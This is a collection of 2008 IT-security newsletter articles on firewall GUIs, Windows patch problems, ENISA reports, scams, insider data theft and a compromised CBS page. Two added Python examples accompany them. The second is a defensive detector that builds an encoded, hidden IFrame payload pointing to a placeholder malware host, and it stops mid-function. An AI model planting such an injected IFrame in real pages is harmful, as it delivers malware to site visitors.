Good GUIs prevent mistakes
As administrators are, fortunately, just ordinary people, even they can make mistakes. A well-designed user interface can help prevent many mistakes which can easily occur. One typical area, for instance, is when checking the details input in screen forms. A MAC address must only comprise quite specific characters, therefore making it easy to check. It should not be possible to activate configurations where mistakes in the content have been recognised. The number one method for checking input is to carry out a comprehensive consistency check where a major part of the configuration is checked for its consistency. A good example in this case is checking the consistency of a gateway’s complete network configuration. This will prevent administrators from shooting themselves in the foot as a result of changes made. Another example of what is potentially a very complex configuration is a rule tester for firewall rules, which indicates what effect scheduled changes have on important connections.
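The following is an added example, not phion's code and not any product's configuration format: it shows named objects, a MAC-address input check, a consistency check over the complete network configuration that blocks activation, and a small rule tester. The configuration layout, object names, function names and addresses are all constructed for the illustration.

```python
import copy
import ipaddress
import re

# Constructed sample data (hypothetical layout, not any product's format).
# Networks and hosts are named objects; everything else refers to them by name.
OBJECTS = {
    "lan-office": "10.1.0.0/24",
    "dmz": "192.0.2.0/28",
    "mail-server": "192.0.2.5/32",
    "any": "0.0.0.0/0",
}
CONFIG = {
    "interfaces": [
        {"name": "eth0", "mac": "00:1a:2b:3c:4d:5e", "network": "lan-office"},
        {"name": "eth1", "mac": "00:1a:2b:3c:4d:5f", "network": "dmz"},
    ],
    "default_gateway": "192.0.2.1",
    "rules": [  # evaluated top to bottom, first match wins
        {"src": "lan-office", "dst": "mail-server", "port": 25, "action": "allow"},
        {"src": "any", "dst": "any", "port": None, "action": "deny"},
    ],
}
MAC_RE = re.compile(r"[0-9A-Fa-f]{2}(:[0-9A-Fa-f]{2}){5}")


def check_consistency(objects, config):
    """Check the whole network configuration; return a list of error strings."""
    errors, valid = [], {}
    for name, value in objects.items():
        try:
            valid[name] = ipaddress.ip_network(value)
        except ValueError:
            errors.append(f"object {name}: {value!r} is not a valid network")
    attached = []
    for iface in config["interfaces"]:
        if not MAC_RE.fullmatch(iface["mac"]):
            errors.append(f"{iface['name']}: malformed MAC {iface['mac']!r}")
        if iface["network"] in valid:
            attached.append((iface["name"], valid[iface["network"]]))
        else:
            errors.append(f"{iface['name']}: undefined or invalid object {iface['network']!r}")
    for i, (name_a, net_a) in enumerate(attached):
        for name_b, net_b in attached[i + 1:]:
            if net_a.overlaps(net_b):
                errors.append(f"{name_a} and {name_b}: overlapping networks")
    gateway = ipaddress.ip_address(config["default_gateway"])
    if not any(gateway in net for _, net in attached):
        errors.append(f"default gateway {gateway} is on no attached network")
    for number, rule in enumerate(config["rules"], start=1):
        for field in ("src", "dst"):
            if rule[field] not in valid:
                errors.append(f"rule {number}: undefined or invalid object {rule[field]!r}")
    return errors


def activate(objects, config):
    """Refuse to activate a configuration in which any mistake was recognised."""
    errors = check_consistency(objects, config)
    if errors:
        raise ValueError("not activated: " + "; ".join(errors))
    return True


def evaluate(objects, rules, src_ip, dst_ip, port):
    """Return the action of the first rule matching the connection (default deny)."""
    src, dst = ipaddress.ip_address(src_ip), ipaddress.ip_address(dst_ip)
    for rule in rules:
        if (src in ipaddress.ip_network(objects[rule["src"]])
                and dst in ipaddress.ip_network(objects[rule["dst"]])
                and rule["port"] in (None, port)):
            return rule["action"]
    return "deny"


def rule_test(old_objects, new_objects, rules, probes):
    """List the probe connections whose verdict a planned object change would alter."""
    changed = []
    for probe in probes:
        before = evaluate(old_objects, rules, *probe)
        after = evaluate(new_objects, rules, *probe)
        if before != after:
            changed.append((probe, before, after))
    return changed


# Planned change: one edit to the object moves the mail server everywhere it is used.
PLANNED = {**OBJECTS, "mail-server": "192.0.2.9/32"}
PROBES = [("10.1.0.20", "192.0.2.5", 25), ("10.1.0.20", "192.0.2.9", 25),
          ("10.1.0.20", "192.0.2.5", 80)]

# Constructed faulty variant: bad MAC, and a DMZ object that now overlaps the LAN.
BROKEN_OBJECTS = {**OBJECTS, "dmz": "10.1.0.128/25"}
BROKEN_CONFIG = copy.deepcopy(CONFIG)
BROKEN_CONFIG["interfaces"][1]["mac"] = "00:1a:2b:3c:4d:zz"

if __name__ == "__main__":
    print(activate(OBJECTS, CONFIG))
    for line in check_consistency(BROKEN_OBJECTS, BROKEN_CONFIG):
        print("ERROR", line)
    for probe, before, after in rule_test(OBJECTS, PLANNED, CONFIG["rules"], PROBES):
        print(probe, before, "->", after)
```

Changing the single `mail-server` object flips the verdict for mail traffic to both the old and the new address, which is exactly what a rule tester should surface before the change goes live.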

In 2008 administrators must expect to use tools such as drag-and-drop to speed up input and make it more attractive. Configuration tasks involving several systems, which are renowned for being unpleasant and prone to errors, can be simplified dramatically by combining the use of configuration templates with a graphical editor. For instance, this tool makes it possible to draw the desired VPN tunnel topology simply using the mouse.

One feature which is very valuable in multi-administrator environments is integrated version control, which is based, for instance, on the tried-and-tested Revision Control System (RCS). This makes it possible to establish which administrator has changed what, when and from where. The scope of application here is versatile. Firstly, it is very easy to make changes retrospectively. Secondly, this type of system can be used to quickly roll back the configuration to an older version in order to be able to calmly analyse the side effects that may have suddenly arisen as a result of a complicated change. The key point is that this kind of function is fully integrated in the interface and that the authentication system provides for the appropriate roles.

<>

Broken Sandisk Cruzer Enterprise

by Michael Smith

A lot of people seem to have what they perceive to be problems with the Sandisk Cruzer and the Cruzer Enterprise device.

It will appear to them that it is not being recognized by their computer and a message gets thrown up that says something like “Cruzer Enterprise requires 2 drive letters...”

I have the same problem with my XP Pro machine and have also assumed that this is a problem with the device, i.e. that it has failed for some reason and is broken.

The failure does not lie, however, with the Sandisk Cruzer device – and once again my apologies to the folks at Sandisk for having assumed them to be at fault though they could have used the opportunity to inform readers of what the real issue is but did not – but with the user's computer.

Yes, folks, honestly. It is Windows that is at fault, and here especially XP. But on its own XP would be fine. The problem is that there is a patch that came “down” in (automatic) Windows Update some time ago originally – in my personal case around April 2008 – and this patch cannot be removed.

Microsoft has released a hotfix for this some time back but there is one problem with that. In most cases the hotfix fixes nothing.

I have applied the fix and exactly – no change. However, on my Fujitsu Siemens laptop with Vista the Cruzer stick works fine, as does the Kingston Data Traveler Black Box. That does not work on my XP Pro PC either. On the other hand the Blockmaster Safestick and the MXI devices all work fine on that PC.

It would appear that this patch only knocks out some of the .exe programs that are used for automatic data encryption by some manufacturers.

So, to quickly sum it up, folks: It is not your Sandisk Cruzer stick that is broken; there is a problem on your Windows operating system. Unfortunately, the hotfix does not fix things so maybe someone needs to hit the guys in Redmond on the head with something.

This was the final straw that made me ultimately turn off Windows Updates. So far I have had more grief with that than anything and I am rather fed up with having to spend ages having to sort out the mess that has been created by such updates. One of the other instances was when a patch disabled Zonealarm firewall and that for thousands of users. Well done, Microsoft!

Once again, folks. The fault lies with the patches from Microsoft for Windows OS rather than with the device(s). Anyone feeling strongly enough about this could always send a nicely worded message to Microsoft's good offices. Maybe they then wake up to the fact that it is not funny being on the receiving end for users of patches that screw things up.

On the other hand, any more screw ups like this might finally get the message across to the makers that they must make their sticks also compatible with Linux and other Open Source operating systems and it may also get the message across to PC users that there are other alternatives to Windows, namely Linux, BSD and other Open Source programs. You do not have to run Windows, generally.

© M Smith (Veshengro), December 2008
<>

Virtual Worlds - Real Money. Multiplayer online gamers 'soft target' for cybercriminals - EU Agency report warns.

Serious real-world money locked up in the 1.5 Bn Eur virtual goods market is leading to a wave of malware threatening ca 1 Bn users worldwide. The EU Agency's report includes 12 recommendations for governments, game providers and users.

Online gaming fraud is an increasingly serious threat - according to a new ENISA report. The failure to recognise the importance of protecting real-money value locked up in this grey-zone of the economy has led to a 'year of online-world fraud'. A survey in the report shows that 30% of users have recently lost some form of virtual property through fraud. In less than a year, more than 30,000 new malicious programs have been detected specifically targeting accounts and property in online games and virtual worlds - "this is a jump of 145%", says Kaspersky labs.

Such malware is invariably aimed at the theft of virtual property accumulated in a user's account and its sale for real money. "While annual real-money sales of virtual goods is estimated at nearly 1.5 Bn Euro worldwide, users can do very little if their virtual property is stolen. They are a very soft target for cybercriminals," says Giles Hogben, editor of the report put together by a group of industry, academic and government experts. "There are 1 Bn registered players of online games worldwide and the malware targeting them affects everyone with a computer connected to the internet."

Privacy and personal data
Another important area is the misuse of personal data. The survey of 1.500 respondents in the UK, Sweden and Germany shows that most people think their avatar cannot reveal anything about their real identity. But an avatar is no different from using any online persona, particularly in so-called "social worlds", i.e. hybrids between online games and social networks. "People should take just as much care of their personal data in these environments as in any other online context," says Mr. Andrea Pirotti, Executive Director of the Agency. Bots can be sprinkled within virtual worlds to spread spam or advertise products, for example, and these sites are vulnerable to novel variants of denial of service attacks. "Multiplayer online games are especially vulnerable to denial of service attacks because of their centralized architecture and poorly authenticated clients," the report says. The report identifies 12 recommendations to tackle these problems, e.g.:

- An industry-wide forum for service providers to share best-practice on security vulnerabilities
- Clarification of virtual property rights for more adequate theft protection
- A checklist of key technical issues for service providers/developers
- Awareness-raising campaigns for users, e.g. on child-safety and privacy risks.

For full report and survey see: http://www.enisa.europa.eu/doc/pdf/deliverables/enisa_pp_security_privacy_virtualworlds.pdf

Source: ENISA
<>

How do 23 countries in Europe strengthen the resilience of public communication networks? EU Agency presents the first EU-wide survey on policies and

The EU Agency ENISA presents its first ever EU wide report on "Stock Taking of Regulatory and Policy Issues related to Resilience of public eCommunications Networks"

In October 2008 ENISA released the first ever comprehensive European report which presents 23 different national regulatory and policy strategies that are being used to facilitate, support and strengthen efforts to improve dependability and resilience of public eCommunications Networks.

In summary, the report identified that there is a significant variety in the deployed strategies, policies, initiatives and regulatory provisions across the EU. Despite these differences, certain preliminary strategy commonalities across Europe for increasing resilience can be highlighted:

- Development of a national strategy, a solid policy and/or regulatory environment and concrete preparedness measures; define clear roles and responsibilities of public agencies; encourage intra-agency and information sharing.
- Encouragement of voluntary collaboration between public and private stakeholders. Capitalising on the know-how of experts from both industry and public authorities to support the development of best practices and guidelines.
- Focus on how well things are working in practice (e.g. exercises, audits, onsite visits, etc.)
- Prompt reaction on reported incidents and their analysis within a trusted group of experts from public and private sector stakeholders
- Multiple, frequently performed small steps have proved to be more effective than big national initiatives. This holds true for current and future e-resilience issues.

This study is done in the context of ENISA's multi annual thematic program on Resilience of public communication networks. It focuses on giving an accurate picture of each country's policies, initiatives, and regulations. Institutional stakeholders could use this inventory of policies and strategies to identify common approaches, confirm the appropriateness of their measures and activities, and to become inspired by the initiatives of other countries.

The Executive Director of ENISA, Mr. Andrea Pirotti remarked: "This work underpins Member States authorities' efforts to debate and co-operate on this issue in a structured manner. We will continue serving this constituency with the full analysis of the stock taking findings."

The analysis of the stock taking results is due to be published by ca mid January, 2009, after the workshop that has taken place in Brussels on 12-13th of November.

For those who do not, as yet, know, the European Network and Information Security Agency (ENISA) is an agency of the European Union. ENISA was created in 2004 by EU Regulation No 460/2004 and is fully operational since September 1st, 2005. It has its seat in Heraklion, Crete (Greece). The objective of ENISA is to improve network and information security in the European Union. The agency has to contribute to the development of a culture of network and information security for the benefit of the citizens, consumers, enterprises and public sector organisations of the European Union, and consequently will contribute to the smooth functioning of the EU Internal Market. ENISA assists the Commission, the Member States and, consequently, the business community in meeting the requirements of network and information security, including present and future Community legislation. ENISA ultimately strives to serve as a centre of expertise for both Member States and EU Institutions to seek advice on matters related to network and information security.

Source: ENISA
<>

Coalition attempts a crackdown on lottery spammers

by Michael Smith

What generally increases when the overall economy declines? That’s right – crime. And these days, when you receive an email that proclaims that you’ve won the “Yahoo! Lottery,” the financially-pressured optimist in you might be more inclined to bite the bait.

Let's face it. If you have not actually entered a lottery of any sort then the chances that you are a winner are very, very slim indeed. In fact they are nil. Period!

Last May, Yahoo filed a lawsuit against “Yahoo! Lottery” spammers who use the Yahoo brand to trick unsuspecting users into handing over personal data to claim a prize. While progress is being made on catching those scammers, there is concern that they may step up efforts to dupe people impacted by these tough times.

Aside from those scams which, in my opinion, should be easy to spot (see my message above), there are those messages that purport to come from one's bank or building society, requesting one update this or that or whatever. Banks will not, in general, ever use the email channel for such communications and therefore the user can be assured that 99.99% of any such messages are not from the user's bank.

I have gotten emails from the United Farmers Bank, for instance, and, seeing that I am in the UK it is hardly possible for me to be a customer of this bank from the Midwest, so I believe, in the USA.

Recently Yahoo announced a public-private coalition with Microsoft, the African Development Bank, and Western Union to allow victims of lottery scams to upload police reports that Yahoo (and other such services) can use with the goal of tracking down these devious criminals and developing better ways of protecting people online. INTERPOL has gotten involved to inform international law enforcement agencies about the initiative and provide guidance on critical information to collect to identify trends and common patterns.

Yahoo! and the other coalition members have set up dedicated email addresses and Web sites (Yahoo's website for this is: http://antispam.yahoo.com/phishingtips) where lottery scam victims – those who took the bait and handed over personal information – can share details of the police report they have filed. These reports may be helpful to other coalition members and law enforcement in fighting lottery scammers.

For readers who spot a scam but don’t fall for it, Yahoo has tips as well. First off, don’t ever reply to the message, even as a joke. Some people do and have done but... Firstly you do not want to be encouraging those people – if one can call them people. Instead, if you are a Yahoo mail user, click the “Spam” button, which helps Yahoo and their anti-spam systems block these types of messages and kick these criminals off the Internet. In addition to that, replying to any such message, even in jest, identifies to the “spammers” that yours is an active email account and instead of stopping they will increase their activity, targeting your account.

A little reminder, if it be needed: no one ever wins the Yahoo! Lottery. The reason for this is simple. There simply is no Yahoo! Lottery. The same holds true for any MSN Lottery and any such.

As I have said above: if you have not actually directly entered a lottery or sweepstake, then the chances for a win are simply nil.

You may also rest assured that you are not the beneficiary of some millions that some aunt you never knew you had or some Nigerian woman who died has bequeathed to you. Also, if that be the case, why would the supposed lawyer request details such as your name, address, sex, etc. that, if you really are the beneficiary, he should already know. Also, you can rest assured that no legal officer uses emails for such kind of business. Why not? Because email is not considered a secure means of operating.

While the economy may be down, still be wary of any unexpected lottery win or the approach by anyone who offers you millions that he has found lying about somewhere unclaimed in an account or such.

Let's enjoy the benefits of the Net but let's also be aware that there are dangers out there. Do not make yourself a victim.

© M Smith (Veshengro), November 2008

THE KEY REVOLUTION LTD ANNOUNCE CHANNEL DEAL WITH INSIGHT

Insight announced as TKR’s first reseller focusing on SME and Public Sector clients

The Key Revolution (TKR), developers of the portable office and secure virtual network solution, Mobiu, have today announced a reseller partnership with Insight Direct (UK) Ltd that will allow distribution of Mobiu into the heart of the UK market. Insight will be selling one-year Mobiu subscription licenses direct to their business customers.

Insight’s customer base is aligned with TKR’s continued horizontal targeting of professional SMEs, with a core market focusing on SMEs with up to 250 employees; with additional sales to prosumers and local government also possible. The deal is now live with Peak as the partner distributor.

Paul Bolt, Marketing & Partner Management Director at Insight comments, “Many of our customers have been asking us for a technology solution that will allow mobile working, without compromising security and that will be easy to use at a reasonable price. In Mobiu, we feel we have selected a best-of-breed product with a sophisticated level of security but at an affordable price, which is critical when spend analysis is as crucial as it is today”.

Adrian Burholt, CEO of The Key Revolution comments, “Insight has enormous reach into the small business market which makes them a natural partner for us. We’re looking forward to working directly with them to help drive demand for the Mobiu product.”

The Mobiu secure virtual network solution offers mobile computing to small/medium businesses and consumers. Mobiu is an advanced USB based device with a SIM card that plugs into a computer and enables the user to automatically store and back up the latest versions of all documents in designated file locations. Mobiu can then securely unlock, access and use all files, data and applications safely, securely, and privately, from any online PC running Windows XP or Vista, in any location. Services included with Mobiu are:

· Plug and play ability
· SIMAssured chip and pin access system
· Web-browsing without leaving a ‘footprint’
· File and folder back-up across multiple PCs direct to MobiVault secure server hosted by NTT Europe Online and powered by Sun Microsystems
· Shared MobiRoom private workspaces that can be set up simply and easily where colleagues and friends can be invited to join and share information
· Remote ‘kill’ feature to disable the Mobiu if the owner reports it as lost/stolen

Mobiu provides 5 gigabytes of file storage and is fully compatible with Windows XP and Vista operating systems. Mobiu uses patented technology in its SIMAssured Technology Platform to provide a secure central gateway.

Pricing: SRP £150 including VAT

The Key Revolution was created by a team of ex-Vodafone employees to license and commercialise technology patented by Vodafone. This technology enables Internet users to securely authenticate themselves and encrypt their data using the SIM (Subscriber Identity Module) - familiar to billions of mobile phone users worldwide. The Key Revolution was licensed to use the technology in September 2007 in return for an early equity stake. The first product from The Key Revolution based on its SIMAssured™ technology platform is Mobiu, a portable office solution which uses a unique SIM enabled solution to access files and applications securely from any online PC running Windows XP or Vista.

For more information, please visit www.thekeyrevolution.com

Insight Direct (UK) Ltd., based in Sheffield, is a wholly owned subsidiary of Insight Enterprises, Inc. (“Insight”). Insight is a leading provider of brand-name information technology ("IT") hardware, software and services to large enterprises, small- to medium-sized businesses and public sector institutions in North America, Europe, the Middle East, Africa and Asia-Pacific. The Company has more than 5,300 teammates worldwide and generated sales of $4.8 billion for its most recent fiscal year, which ended December 31, 2007. Insight is ranked number 477 on Fortune magazine's 2008 "Fortune 500" list.

www.insight.com

Source: Clarke Mulder Purdie

Transatlantic Survey Shows Nervous workers offer to double their hours and reduce their salaries to secure employment

London, December 2008 - It would seem desperate times call for desperate measures as a survey released today shows that workers will do almost anything to keep their jobs – but at a cost to the employer!! The survey, into “The Global Recession and its Effect on Work Ethics”, carried out by IT security data experts Cyber-Ark, found that more than one third of the 600 office workers (from New York’s Wall Street, London’s Canary Wharf and Amsterdam, Holland), confirmed they would be willing to work 80 hours a week, with 25% prepared to take a salary cut, if it meant they could keep their jobs. Nevertheless, these workers are conspiring behind their bosses’ backs to download vital, useful and competitive information to take with them if and when they get the push!

Interestingly, 56% of workers surveyed admitted to being worried about losing their jobs. Alarmingly, in preparation, more than half have already downloaded competitive corporate data and plan to use the information as a negotiating tool to secure their next post: 71% of workers in Holland confessed to having already downloaded data, 58% in the US and just 40% in the UK. When confronted with the prospect of being fired tomorrow, ethics go out the door (so to speak): 71% of those surveyed declared they would definitely take company data with them to their next employer. Top of the list of desirable information is the customer and contact databases, with plans and proposals, product information, and access / password codes all proving popular choices. HR records and legal documents were the least favoured data that employees were interested in taking.

Redundancy is a sore word and rumours that redundancies were looming would send 46% of the global workers interviewed scurrying about trying to obtain the redundancy list. Half said they’d try using their access rights to snoop around the network and, if this failed, they’d consider bribing a ‘mate’ in the IT department to do it for them.

Adam Bosnian, VP of Products, Strategy and Sales of Cyber-Ark says, “Employers have a right to expect loyalty from their workforce, however this works both ways and in these dark days, everyone is jittery especially with lay offs at the top of most corporate agendas - the instinct is to look out for number one. It would be unthinkable to leave money on a desk, an obvious temptation to anyone passing, instead it is always safely locked away and it's time sensitive information is given the same consideration. If times get hard, and they invariably will, companies need to ensure that any cutbacks aren’t deeper than expected when stolen data unexpectedly eradicates any chance of survival – our advice is only allow access to sensitive information to those that really need it, lock it away in a digital vault and encrypt the really sensitive data.”

Surprisingly companies do seem to be heeding the danger that data leakage poses. The study reveals workers globally believe it’s becoming harder to take sensitive information out of the company – 71% in the UK acknowledged it was difficult and 46% in Holland agreed. Yet in the US the message still isn’t getting through with only 38% admitting they had found it difficult to sneak information away.

Memory sticks are the smallest, easiest, cheapest and least traceable method of downloading huge amounts of data, which is why they are often considered the “weapon of choice”. Other methods were photocopying, emailing, CDs, online encrypted storage websites, smartphones, DVDs, cameras, SKYPE, iPods and, rather randomly yet quite disconcertingly, in the UK 7% said they’d memorise the important data!

Additionally, the study discloses that universally we’re not all as equally conscientious and prepared to work all the hours available. 50% of US workers were prepared to work that much harder compared to 37% in Holland and just 27% in the UK in favour of an 80 hour week. Additionally, when asked what other lengths they would go to in order to keep their jobs, the data wasn’t just limited to the hours employees were willing to put in. For the US there were no boundaries with 15% admitting they’d consider blackmailing the boss and 26% prepared to buy the next round of drinks for a year! The Brits and Dutch were less dishonest with just 3% contemplating bribery, and only 6% in Holland and 2% in the UK willing to buy the drinks.

“The damage that insiders can do should not be underestimated. With a faltering economy resulting in increased jobs cuts, deferred promotions and additional stress, companies need to be especially vigilant about protecting their most sensitive data against nervous or disgruntled employees,” adds Bosnian.

What many managers and business owners do not seem to appreciate and understand is that a disgruntled employee or one that is being made redundant does not need a suitcase and access to the photocopier for a day or so in order to steal vital information. All he or she needs is a USB flash drive with a couple of gigabytes and access to your computers and Bob's your Uncle.

The damage that can be done in this way is enormous, and the sales rep who was made redundant and takes all his client and contact list with him to the new firm, getting a cushy number because of that, is nothing compared to it.

Material removed in this way can inflict rather serious damage on any business if someone wanted to release it. On the other hand such knowledge could be vital to a competitor who may hire that former employee.

While it may not be a good idea to ban the use of USB sticks and other flash media throughout the enterprise, like it was done by the US DoD because of a cyber attack (which would hardly be launched from the inside via such drives though this could be done), a policy setting out who can and who cannot transfer files, and which files, should be put in place. This is especially true in the current climate.

The survey into “the global recession and its effect on work ethics”, was carried out by Cyber-Ark’s team of researchers amongst 600 office workers on Wall Street, New York, Canary Wharf London and at an International event in Amsterdam Holland.

Yvonne Eskenzi/Eskenzi PR & Michael Smith, ICT Review

India apportions part-blame for terror attacks to modern technology

by Michael Smith

After the horrific attacks by terrorists on hotels and other targets in the city of Mumbai (Bombay), India, on November 26, 2008, the hysterical online press tried to partially blame modern technology for the fact that the attacks were made possible.

It is, apparently, the fault of the GPS systems and satellite telephones that it was possible for the terrorists to attack those targets in Mumbai with impunity. Doh?

I mean, folks, let's be serious, this is like claiming the knife jumped out of its sheath and attacked the person that was stabbed, for instance. Help!

A few days after the attacks various online media outlets knew immediately why it was at all possible for the terrorists to attack. On board the ship that the terrorists may have used – nothing certain as yet on that – to come to India, GPS maps and a satellite telephone have been found and it is, therefore, obvious that modern technology must shoulder a large part of the blame for this attack having become possible. Wow!

And, in addition to that, the email system is also at fault for it made it possible for the "Deccan Mujahideen" after the attacks to send messages to all the news agencies claiming responsibility. It is being claimed that the emails could be traced back to have originated in Russia. Oh dear. Now there is Russian involvement there as well, is there?

Obviously, had modern technology not existed those attacks would not have happened. That, at least, appears to be some of the reasoning of those so-called journalists.

On the other hand, there are some that put even different angles on these tragic events but...

Some security officials apparently have said that the use of emails by terrorists is by now common and widespread, and that they use this medium to spread their poison far and wide across the globe. I guess that the powers that be will – next – try to stop us using emails or they will claim that they must be able to have the rights to snoop on our email traffic (not that they are not doing this already).

In addition some of the same experts have said that the situation appears to be that terrorists can, without any problems and restrictions, use a satellite phone or a Micro-Blogging System as aids for their terrorist activities. So, the experts say, we must now look at how to keep those high-tech tools out of the hands of terrorists. Oh dear!

Now how do they think that is going to be feasible? Only if they make the use of emails and such illegal or by monitoring all the emails that you and I, who are not terrorists, send across the world, whether for business or other reasons. In addition to that, I am certain, they would like to censor all Blogs and Bloggers. That would suit the authorities anyway, would it not?

We only need to look with regards to Blogging to Italy where the courts have, basically, ruled that Blogging is illegal, and that Bloggers require a government permit.

© M Smith (Veshengro), December 2008

Versatile authentication: the next logical step for the financial services sector

By Philip Hoyer, technical architect, ActivIdentity EMEA

It may already be a cliché, but the credit crunch is forcing all types of businesses to review their costs and look at how they can reduce overheads. For financial institutions with millions of customers, one of the most obvious solutions is to encourage those customers towards using low-cost channels, such as the internet, to manage their accounts rather than going to branches or through call centres which have to be staffed.

But the internet brings significant security risks, and banks must be able to guarantee that a customer is who they say they are in the face of increasingly sophisticated fraud attempts by cyber-criminals who have developed new ways of accessing sensitive information with alarming speed. Clearly, banks must deploy much more than password-based systems in order to encourage more customers to use online facilities and to protect existing internet customers from fraud.

Both Barclays and Natwest have recently announced that they are issuing card readers to customers, indicating the start of a trend towards using strong authentication for all customers, not just businesses or high net worth individuals.

The problem comes with integrating these new technologies into an existing infrastructure. Most banks are already managing a legacy that is comprised of various point solutions that are used to help customers access their accounts via different channels using different technologies. One customer might require a password to use the telephone banking service, and a memorable question for resets or emergency access; another might use a token based on proprietary or OATH technology to access online banking. Similarly, the same institution may, in the future, want to introduce PKI or biometric data to further improve the security of transactions.

Traditionally banks and other financial services firms have built up a collection of point security solutions that are difficult to manage and incredibly costly to maintain. Firms are beginning to realise that there is a need to consolidate varying authentication systems into one single infrastructure that can support different types of credentials, from cards to tokens and interactive voice response technology. Gartner has coined the term “versatile authentication” to describe a platform used to manage all credentials.

A good versatile authentication platform will be based on open standards, so that it can be used as a system “backbone” to manage multiple authentication systems from different providers to maximise investment in pre-existing authentication technologies. This will also enable new authentication methods that may be required in future. This reduces operational and infrastructure costs, and will ultimately reduce the total cost of ownership.

The benefits of versatile authentication are numerous, despite concerns over the impact of introducing new technologies on the user experience. Customers are more likely to put their trust in online financial transactions if they perceive them to be more secure, which will bolster the adoption of low-cost service channels. They will also benefit from a consistent authentication experience across all channels – using their EMV card to access their account via the internet, call centre or branch.

In turn, the bank will benefit from the highest possible levels of security and flexibility, combined with lower costs and the ability to upgrade authentication levels to meet market needs.

The concept of versatile authentication also fits neatly with the trend towards a service oriented architecture which will improve the user experience in the long run. If a customer loses their EMV card, one single command within a versatile authentication platform should be able to disable the device – regardless of what technology it is based upon and the channel through which the customer reported the card missing – thereby cutting down the amount of time spent by staff to resolve the problem.

It’s the next logical step for financial services organisations that want to be ahead of the game, and should demonstrate a fast return on investment in the face of impending recession.

ActivIdentity EMEA is exhibiting at Infosecurity Europe 2009, Europe’s number one dedicated Information security event. Now in its 14th year, the show continues to provide an unrivalled education programme, the most diverse range of new products & services from over 300 exhibitors and 12,000 visitors from every segment of the industry. Held on the 28th – 30th April 2009 in Earls Court, London this is a must attend event for all professionals involved in Information Security.

www.infosec.co.uk

Source: Infosecurity PR

Finjan Warns Users Over CBS Portal Being Compromised by Cybercriminals

Farnborough, United Kingdom, November 2008: Finjan, a leader in secure web gateway products, has warned Internet users to be on their guard, following an apparently compromised web page on one of the sub-domains on the CBS.com portal.

“The cybercriminals, who compromised one of the sub-domains under CBS.com, appear to have added a malicious obfuscated script to the infected page. The injected script then dynamically injects an IFrame that pulls malware from a remote server located in Russia,” said Yuval Ben-Itzhak, Finjan's CTO.

Fortunately for CBS site visitors, Finjan reports actions were already taken to turn that Russian server offline.

Finjan CTO says the company's MCRC - Malicious Code Research Center - has notified CBS of the problem and the team expects the page in question to be taken offline and/or replaced with the original data.

"This saga confirms our many previous warnings that obfuscated code poses a serious threat to Internet users' PCs. Our Threats Reports have continued to identify the increasing use of code obfuscation as a means of bypassing traditional signature-based solutions in order to propagate malware," he said.

"This saga illustrates the popularity of malicious obfuscated code as a weapon of choice by criminal hackers. It also highlights the fact that no Web portal, no matter how high ranking, can be totally secure against a system hack and consequent infection of its visitors. Web users need to exercise caution at all times," he added.

Finjan's security tips and notes to prevent infection:

For businesses:

1. Install a Secure Web Gateway to protect valuable data from being compromised by malware
2. Finjan is offering free Malware Detection Audits to organisations with over 1,000 users
3. Consider the use of a secure platform when accessing Web 2.0 sites

For consumers:

1. Use Finjan's SecureBrowsing browser plug-in to make the right decisions when browsing the Web (see http://securebrowsing.finjan.com )
2. Exercise caution when accessing Web 2.0-enabled sites - e.g. Social Networking portals, wikis and blogs, etc.
3. Do not rely just on signature-based IT security applications

For all users:

1. The preferred way to stop dynamically obfuscated code and similar types of advanced hacking techniques is to analyse and understand the code embedded within Web content on-the-fly before it reaches the user.
2. Proactive, behaviour-based IT security technology performs in-depth analysis of each and every piece of content, regardless of its original source.
3. This analysis breaks the code into parts, understands the execution path and the functions' call flow.
4. As a result, these solutions can identify code that is about to perform a malicious or suspicious operation, and block it at the perimeter, rather than allowing it to enter the network and relying on desktop security.
5. This type of proactive security is akin to having an 'expert system in a box,' safeguarding users from even the most devious attack techniques, such as those disclosed in this and previous Finjan reports.
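A small static check in the spirit of the on-the-fly analysis described in the list above, added here as an illustration and not Finjan's product or code: it undoes two common encodings without executing anything and flags scripts whose decoded form writes a hidden or off-site IFrame. The sample page, the host names and the 0.5 threshold are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed sample: markup an injected script would write, using a placeholder host.
PAYLOAD = '<iframe src="http://cdn.example.invalid/in.php" width="0" height="0"></iframe>'
PCT = "".join("%%%02X" % ord(c) for c in PAYLOAD)    # percent-encoded form
CODES = ",".join(str(ord(c)) for c in PAYLOAD)       # character-code form

SAMPLE_PAGE = (
    '<html><body>\n'
    '<script>var nav = document.getElementById("nav"); nav.className = "open";</script>\n'
    '<script>document.write(unescape("' + PCT + '"));</script>\n'
    '<script>var s = String.fromCharCode(' + CODES + '); document.write(s);</script>\n'
    '</body></html>'
)

UNESCAPE_RE = re.compile(r'unescape\(\s*(["\'])(.*?)\1\s*\)', re.S)
CHARCODE_RE = re.compile(r'String\.fromCharCode\(([\d\s,]+)\)')
PRIMITIVE_RE = re.compile(r'\b(eval|unescape|fromCharCode|document\.write)\b')
ENCODED_RE = re.compile(r'(?:%[0-9A-Fa-f]{2})+|(?:\d{1,3},\s*){8,}\d{1,3}')
IFRAME_RE = re.compile(r'<iframe\b[^>]*>', re.I)
SRC_RE = re.compile(r'src\s*=\s*["\']?([^"\'\s>]+)', re.I)
HIDDEN_RE = re.compile(
    r'(?:width|height)\s*=\s*["\']?0(?![\d.])|display\s*:\s*none|visibility\s*:\s*hidden',
    re.I)


class ScriptExtractor(HTMLParser):
    """Collects the text of every inline <script> element."""

    def __init__(self):
        super().__init__()
        self.scripts, self._in_script = [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data


def _from_codes(match):
    nums = (int(n) for n in re.findall(r"\d+", match.group(1)))
    return "".join(chr(n) for n in nums if n < 0x110000)


def decode_layers(js, max_rounds=3):
    """Statically undo unescape("%xx") and String.fromCharCode(...); nothing is executed.
    %uXXXX escapes and string concatenation tricks are left unresolved."""
    for _ in range(max_rounds):
        new = UNESCAPE_RE.sub(lambda m: unquote(m.group(2)), js)
        new = CHARCODE_RE.sub(_from_codes, new)
        if new == js:
            break
        js = new
    return js


def analyse_script(js, page_host):
    decoded = decode_layers(js)
    tags = IFRAME_RE.findall(decoded)
    hosts = [urlparse(m.group(1)).hostname for m in map(SRC_RE.search, tags) if m]
    external = sorted({h for h in hosts if h and h != page_host})
    hidden = any(HIDDEN_RE.search(t) for t in tags)
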